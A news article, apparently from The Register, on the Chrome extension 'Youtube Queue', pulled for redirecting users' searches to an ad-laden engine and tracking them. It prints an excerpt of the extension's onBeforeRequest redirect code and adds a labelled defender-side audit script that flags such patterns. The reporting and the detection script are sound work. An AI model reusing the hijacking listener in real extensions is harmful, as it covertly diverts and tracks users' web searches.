Youtube Queue Chrome extension booted out of store for search engine hijacking, revealing Google's lax dev checks

Follow us down the rabbit hole in uncovering who is possibly responsible

Google has removed a Chrome extension called Youtube Queue from its official online store for violating its program policies following complaints it was hijacking users' web searches.

However, another extension called Croowila Videos Player that shares similar suspect code remains available.

Via Twitter on Monday, Microsoft principal program manager Eric Lawrence explained that the JavaScript in both extensions "abuses [the] webRequestBlocking API and redirects [the] user's search query from HTTPS website to unexpected search engine laden with ads using unsecured HTTP."

On Reddit and other internet forums, multiple gripes about the Youtube Queue extension have surfaced. Reviews posted on the removed Chrome Web Store page suggest the add-on, used by several thousand people, went bad around June 7 this year.

Youtube Queue, not to be confused with YouTube Queue or YOUTUBE QUEUE or Queue for Youtube, was supposed to help you line up YouTube videos one after the other – though it hijacked web search queries and sent netizens instead to a search service called Croowila and a web page identified as Information Vine to display ads. It also transmitted globally unique identifiers (GUIDs) attached to each of its users so they could be individually tracked on the web.

But even Google had trouble identifying those responsible for the Youtube Queue extension, a testament to the Chrome Web Store's lax security procedures and oversight that allows confusingly similar extension names.

Alerted to the issue, the ad giant contacted support@softools.com, listed as the email address for the add-on, and two other email addresses affiliated with googlegroups.com and gmail.com, to inform those responsible for the software about its ejection from the Chrome Web Store.

"Dear Developer," Google's message reads, "Your Google Chrome item, 'Youtube Queue,' with ID: pgeplakfmipjphmlpnfbeldbficaeack did not comply with our program policies and was removed from the Google Chrome Web Store."

But according to Bill Auerbach, who created legacy processor toolchain biz Softools, Inc, which operates on the softools.com domain, his company's support address was listed on the Youtube Queue page seemingly without authorization or any verification by Google. He provided The Register with a copy of the Google email he received.

"The support address listed with the app is incorrect," he said in an email to The Register. "We have nothing to do with it. We’ve been contacted by Google about a bad app/plug-in and told them the address is wrong. They’ve already pulled the app."

Google did not respond to a request for comment.

The Register contacted Abhishek Deora, a developer whose name can be found in the Youtube Queue extension code, to try to understand how things went wrong. Deora's GitHub contains a project called "youtube_queue_extension" that, at the time this story was filed, included a link to the removed Chrome Web Store listing. However, the GitHub repo lacks the search redirection code.

In an email, Deora explained, "I have recently sold the extension to softools. After selling it these issues starting coming but I am no longer the owner." (Auerbach suggested inquiring to softools.net in the UK, but there's no reason to believe that company had anything to do with the adware extension either.)

Deora said he had created a new version of the extension called "Queue Tube" after seeing all the complaints from users. It doesn't include the search redirection of the banned version.

The Register has sent an inquiry to the individual said to have purchased the Youtube Queue extension code from Deora, apparently an Israeli with experience in malware research and computer security, but we've not heard back. The Youtube Queue developer information in the Chrome Web Store listing included an address in Tel Aviv, Israel, though it could be inaccurate like the errant softools.com email link.

The deceptive code attempts to remain inconspicuous by redirecting only once per browsing session. For Youtube Queue, it can be found in src/js/background.js. For Croowila Videos Player, the background.js file in the extension's root directory is almost identical. Both rely on the Chrome Extensions API chrome.webRequest.onBeforeRequest to intercept and redirect search queries.

chrome.webRequest.onBeforeRequest.addListener(function (details) {
   var isSearchEngineRet;
   var searchEngine;
   var handlerDecision;
   var query;
   var shouldStartCheck = false;

   if (details.type == "main_frame") {
      if (SEARCH_TABS.indexOf(details.tabId) > -1) {
         return {
            cancel: false
         };
      }

   [isSearchEngineRet, searchEngine] = isSearchEngine(details.url);
   if (isSearchEngineRet == true) {
      [handlerDecision, query] = SEARCH_ENGINE_PROVIDERS[searchEngine][1](details.url);
      //console.log(handlerDecision);
      if (handlerDecision == "pass") { 
         return {
            cancel: false
         };
      } else if (handlerDecision == "redirect") {
           SEARCH_TABS.push(details.tabId);
           //CURRENT_SEARCH_ENGINE = SEARCH_ENGINE_PROVIDERS[searchEngine][0];
           return {
              redirectUrl: REDIRECT_URL + encodeURIComponent(query)
           };
      }
...
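
A defender-side triage for the pattern in the excerpt above, as an added example that is not code from the article or from either extension: it flags an unpacked extension whose manifest requests blocking webRequest access to all sites and whose scripts return a redirectUrl from an onBeforeRequest listener. It assumes a Manifest V2 extension (host patterns listed under `permissions`); the manifests, file contents and the `search.example.invalid` URL are constructed samples, and `auditExtension` is a hypothetical helper name.

```javascript
// Host patterns that give an extension access to every site.
const BROAD_HOSTS = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];

// manifest: parsed manifest.json; sources: { "relative/path.js": "file text" }
function auditExtension(manifest, sources) {
  const findings = [];
  const perms = manifest.permissions || [];
  const canBlock = perms.includes("webRequest") && perms.includes("webRequestBlocking");
  if (canBlock) findings.push("manifest: webRequest + webRequestBlocking requested");
  const broad = perms.filter((p) => BROAD_HOSTS.includes(p));
  if (canBlock && broad.length) {
    findings.push("manifest: blocking access to all sites (" + broad.join(", ") + ")");
  }
  for (const [file, code] of Object.entries(sources)) {
    const hooks = /chrome\.webRequest\.onBeforeRequest\.addListener/.test(code);
    const redirects = /\bredirectUrl\s*:/.test(code);
    if (hooks && redirects) findings.push(file + ": onBeforeRequest listener returns redirectUrl");
    // Plain-HTTP string literals are candidate redirect targets worth reviewing.
    for (const m of code.matchAll(/["'](http:\/\/[^"']+)["']/g)) {
      findings.push(file + ": cleartext URL literal " + m[1]);
    }
  }
  return findings;
}

// Constructed sample: a "video queue" add-on that has no need to see all traffic.
const suspectManifest = {
  name: "Sample Video Queue",
  permissions: ["webRequest", "webRequestBlocking", "<all_urls>", "storage"],
};
const suspectSource = [
  'var REDIRECT_URL = "http://search.example.invalid/?q=";',
  "chrome.webRequest.onBeforeRequest.addListener(function (details) {",
  '  return { redirectUrl: REDIRECT_URL + encodeURIComponent("q") };',
  '}, { urls: ["<all_urls>"] }, ["blocking"]);',
].join("\n");

// Constructed sample: an add-on scoped to the one site it claims to serve.
const benignManifest = { name: "Sample Scoped Queue", permissions: ["tabs", "https://www.youtube.com/*"] };
const benignSource = "chrome.tabs.onUpdated.addListener(function () {});";

const suspectFindings = auditExtension(suspectManifest, { "src/js/background.js": suspectSource });
const benignFindings = auditExtension(benignManifest, { "background.js": benignSource });
console.log(suspectFindings.join("\n"));
console.log("benign findings:", benignFindings.length);
```

Because ownership of an extension can change between releases, a check like this is most useful when re-run on every update and compared against the findings for the previous version.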

A source familiar with the issue told The Register that buying a popular extension and altering the code to allow abuse has become a common attack vector, along with hacking developer accounts, which is one of the reasons Google has been pushing 2FA for developers. ®

Speaking of Chrome extensions... Google today announced the release of its Suspicious Site Reporter extension, a tool for reporting dodgy-looking websites to the Safe Browsing team. It also displays an icon if you land on a potentially unsafe webpage.



